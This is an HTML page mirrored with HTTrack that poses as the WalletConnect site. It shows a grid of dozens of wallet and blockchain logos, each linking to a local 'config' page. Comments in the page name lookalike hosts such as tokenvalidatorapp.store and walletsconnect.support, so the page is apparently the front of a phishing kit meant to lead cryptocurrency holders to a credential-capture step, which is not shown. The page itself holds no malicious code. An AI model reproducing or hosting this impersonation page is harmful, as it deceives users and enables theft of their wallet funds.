<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from tokenvalidatorapp.store/start/index-2.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Nov 2021 18:41:46 GMT -->
<head><meta charset="utf-8">
	<link href="main.css" rel="stylesheet" type="text/css" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="description" content="Open protocol for connecting Wallets to Dapps"><meta property="og:image" content="images/logo.svg">
	<link href="images/logo.svg" rel="icon" /><script>
function show() {
  var x = document.getElementById("hidden");
  if (x.style.display === "none") {
    x.style.display = "block";
  } else {
    x.style.display = "none";
  }

  if (x.style.display === "block") {
    document.getElementById("btn").innerHTML = "Show Less &uarr;";
  } 
}
</script>
	<title>WalletConnect</title>
</head>
<body>
<center>
<div class="top"><a class="left" href="#footer">Github</a> <a class="left" href="#">Docs</a> <a class="main" href="index-2.html"><img alt="logo" src="images/logo.svg" /></a> <a class="left" href="#wallets">Wallets</a> <a class="left" href="#">Apps</a></div>
&nbsp;

<div class="gFeYHJ">WalletConnect</div>

<p>Multiple iOS and Android wallets support the WalletConnect protocol. Interaction between mobile apps and mobile browsers are supported via mobile deep linking.</p>
&nbsp;

<div class="all">
<div class="apps"><a href="config/meta647784e3b7.html?type=metamask"><img src="images/metamask.png" /></a><br />
MetaMask</div>

<div class="apps"><a href="config/trust-wallet83899392118.html?type=trust+wallet"><img src="images/trustwallet.png" /></a><br />
Trust Wallet</div>

<div class="apps"><a href="config/coinbase-walletdca7.html?type=coinbase+wallet"><img src="images/coinbase.jpg" /></a><br />
Coinbase Wallet</div>

<div class="apps"><a href="config/Bitpayad44.html?type=bitpay"><img src="images/bitpay.jpg" /></a><br />
BitPay</div>

<div class="apps"><a href="config/atomic-wallet0b9a.html?type=atomic+wallet"><img src="images/atomic.png" /></a><br />
Atomic Wallet</div>

<div class="apps"><a href="config/Exodus6a11.html?type=exodus"><img src="images/exodus.jpg" /></a><br />
Exodus</div>

<div class="apps"><a href="config/binance-smart-chain1854.html?type=binance+smart+chain"><img src="images/binance.png" /></a><br />
Binance Smart Chain</div>

<div class="apps"><a href="config/bnb3664.html?type=bnb"><img src="images/bnb.png" /></a><br />
BNB</div>

<div class="apps"><a href="config/polkadot5a30.html?type=polkadot"><img src="images/polkadot.png" /></a><br />
Polkadot</div>

<div class="apps"><a href="config/xrp2979.html?type=xrp"><img src="images/xrp.png" /></a><br />
XRP</div>

<div class="apps"><a href="config/stellarbd0f.html?type=stellar"><img src="images/stellar.png" /></a><br />
Stellar</div>

<div class="apps"><a href="config/tezosdf8a.html?type=tezos"><img src="images/tezos.png" /></a><br />
Tezos</div>

<div class="apps"><a href="config/theta7d1a.html?type=theta"><img src="images/theta.png" /></a><br />
Theta</div>

<div class="apps"><a href="config/troncea2.html?type=tron"><img src="images/tron.png" /></a><br />
Tron</div>

<div class="apps"><a href="config/cosmosa71a.html?type=cosmos"><img src="images/cosmos.png" /></a><br />
Cosmos</div>

<div class="apps"><a href="config/kava0713.html?type=kava"><img src="images/kava.png" /></a><br />
Kava</div>

<div class="apps"><a href="config/filecoincb21.html?type=filecoin"><img src="images/filecoin.png" /></a><br />
Filecoin</div>

<div class="apps"><a href="config/solanadf6a.html?type=solana"><img src="images/solana.png" /></a><br />
Solana</div>

<div class="apps"><a href="config/ethereum-classic7a80.html?type=ethereum+classic"><img src="images/ethereum-classic.png" /></a><br />
Ethereum Classic</div>

<div class="apps"><a href="config/Squarelinkffeb.html?type=squarelink"><img src="images/squarelink.png" /></a><br />
Squarelink</div>

<div class="apps"><a href="config/Zilliqa8af2.html?type=zilliqa"><img src="images/zilliqa.png" /></a><br />
Zilliqa</div>

<div class="apps"><a href="config/wallet-connectff05.html?type=wallet+connect"><img src="images/logo.svg" /></a><br />
Wallect<br />
Connect</div>

<div class="apps"><a href="config/Elrond0712.html?type=elrond"><img src="images/elrond.jpg" /></a><br />
Elrond</div>

<div class="apps"><a href="config/Wavesbd88.html?type=waves"><img src="images/waves.png" /></a><br />
Waves</div>

<div class="apps"><a href="config/Icon915e.html?type=icon"><img src="images/icon.png" /></a><br />
ICON</div>

<div class="apps"><a href="config/Ontology14d3.html?type=ontology"><img src="images/ontology.png" /></a><br />
Ontology</div>
</div>
<br />
<button class="btn" id="btn" onclick="show()">Show More &darr;</button><br />
&nbsp;
<div class="hidden" id="hidden">
<div class="all">
<div class="apps"><a href="config/Nano1e44.html?type=nano"><img src="images/nano.png" /></a><br />
Nano</div>

<div class="apps"><a href="config/Tomo-Chain41db.html?type=tomo+chain"><img src="images/tomo.png" /></a><br />
Tomo Chain</div>

<div class="apps"><a href="config/IoTex250c.html?type=iotex"><img src="images/iotex.png" /></a><br />
IoTex</div>

<div class="apps"><a href="config/Wanchain2d9f.html?type=wanchain"><img src="images/wanchain.png" /></a><br />
Wanchain</div>

<div class="apps"><a href="config/Harmonyc9c2.html?type=harmony"><img src="images/harmony.png" /></a><br />
Harmony</div>

<div class="apps"><a href="config/Kin830c.html?type=kin"><img src="images/kin.png" /></a><br />
Kin</div>

<div class="apps"><a href="config/Nimiq473e.html?type=nimiq"><img src="images/nimiq.png" /></a><br />
Nimiq</div>

<div class="apps"><a href="config/Aion0771.html?type=aion"><img src="images/aion.png" /></a><br />
Aion</div>

<div class="apps"><a href="config/mew-wallet884848838f2.html?type=MEW+wallet"><img src="images/MEW.png" /></a><br />
MEW Wallet</div>

<div class="apps"><a href="config/Thunder-token5789.html?type=thunder-token"><img src="images/thundertoken.png" /></a><br />
Thunder Token</div>

<div class="apps"><a href="config/Aeternity74d9.html?type=aerternity"><img src="images/aeternity.png" /></a><br />
Aeternity</div>

<div class="apps"><a href="config/Nebulas16e7.html?type=nebulas"><img src="images/nebulas.png" /></a><br />
Nebulas</div>

<div class="apps"><a href="config/FIO99b2.html?type=fio"><img src="images/fio.png" /></a><br />
FIO</div>

<div class="apps"><a href="config/GoChaineb25.html?type=gochain"><img src="images/gochain.png" /></a><br />
GoChain</div>

<div class="apps"><a href="config/POA-Network5638.html?type=POA+network"><img src="images/poa.png" /></a><br />
POA Network</div>

<div class="apps"><a href="config/Callisto0f79.html?type=callisto"><img src="images/callisto.png" /></a><br />
Callisto</div>

<div class="apps"><a href="config/Aktionariatb52a.html?type=aktionariat"><img src="images/aktionariat.png" /></a><br />
Aktionariat</div>

<div class="apps"><a href="config/AtWallet7d14.html?type=atwallet"><img src="images/atwallet.png" /></a><br />
AtWallet</div>

<div class="apps"><a href="config/AAVEbbd9.html?type=aave"><img src="images/aave.jpg" /></a><br />
AAVE</div>

<div class="apps"><a href="config/Enjinbf5c.html?type=enjin"><img src="images/enjin.jpg" /></a><br />
Enjin</div>

<div class="apps"><a href="config/Skale1cb0.html?type=skale"><img src="images/skale.png" /></a><br />
Skale</div>

<div class="apps"><a href="config/Portisd316.html?type=portis"><img src="images/portis.png" /></a><br />
Portis</div>

<div class="apps"><a href="config/Trezor4db6.html?type=trezor"><img src="images/trezor.png" /></a><br />
Trezor</div>

<div class="apps"><a href="config/Toruseb9b.html?type=torus"><img src="images/torus.jpg" /></a><br />
Torus</div>

<div class="apps"><a href="config/VeChain4df7.html?type=vechain"><img src="images/vechain.jpg" /></a><br />
VeChain</div>

<div class="apps"><a href="config/Scatter-Wallet6780.html?type=scatter+wallet"><img src="images/scatter.jpg" /></a><br />
Scatter Wallet</div>

<div class="apps"><a href="config/Math-Wallet851b.html?type=math+wallet"><img src="images/math-wallet.png" /></a><br />
Math Wallet</div>

<div class="apps"><a href="config/FortMaticdcc9.html?type=fortmatic"><img src="images/fortmatic.png" /></a><br />
FortMatic</div>

<div class="apps"><a href="config/Digitex6d75.html?type=digitex"><img src="images/digitex.png" /></a><br />
Digitex</div>

<div class="apps"><a href="config/Ledgerea66.html?type=ledger"><img src="images/ledger.png" /></a><br />
Ledger</div>

<div class="apps"><a href="config/Defiatd858.html?type=defiat"><img src="images/defiat.jpg" /></a><br />
Defiat</div>

<div class="apps"><a href="config/Authereumd03d.html?type=authereum"><img src="images/authereum.png" /></a><br />
Authereum</div>

<div class="apps"><a href="config/Flare-Walletb08c.html?type=flare+wallet"><img src="images/flare.jpg" /></a><br />
Flare Wallet</div>

<div class="apps"><a href="config/Zelcoref78f.html?type=zelcore"><img src="images/zelcore.png" /></a><br />
Zelcore</div>

<div class="apps"><a href="config/BitKeepc865.html?type=bitkeep"><img src="images/bitkeep.png" /></a><br />
BitKeep</div>

<div class="apps"><a href="config/Coin98ef39.html?type=coin98"><img src="images/coin98.png" /></a><br />
Coin98</div>

<div class="apps"><a href="config/Trust-Vault0620.html?type=trust+vault"><img src="images/trustvault.png" /></a><br />
Trust Vault</div>
</div>
</div>
</div>

<footer>
<div id="footer">
<p><img class="footimg" src="images/discord.svg" /> <a href="https://discord.gg/jhxMvxP">Discord</a></p>
&nbsp;

<p><img class="footimg" src="images/telegram.svg" /> <a href="https://t.me/walletconnect_announcements">Telegram</a></p>
&nbsp;

<p><img class="footimg" src="images/twitter.svg" /> <a href="https://twitter.walletconnect.org/">Twitter</a></p>
&nbsp;

<p><img class="footimg" src="images/github.svg" /> <a href="https://github.com/walletconnect">Github</a></p>
</div>
</footer>
</center>
</body>
<!-- Mirrored from walletconnect.support/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 10 Mar 2021 13:07:42 GMT --><!-- Mirrored from walletsconnect.support/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 15 Mar 2021 00:16:00 GMT --><!-- Mirrored from walletsliveconnect.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 04 May 2021 12:22:50 GMT -->
<!-- Mirrored from tokenvalidatorapp.store/start/index-2.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Nov 2021 18:41:46 GMT -->
</html>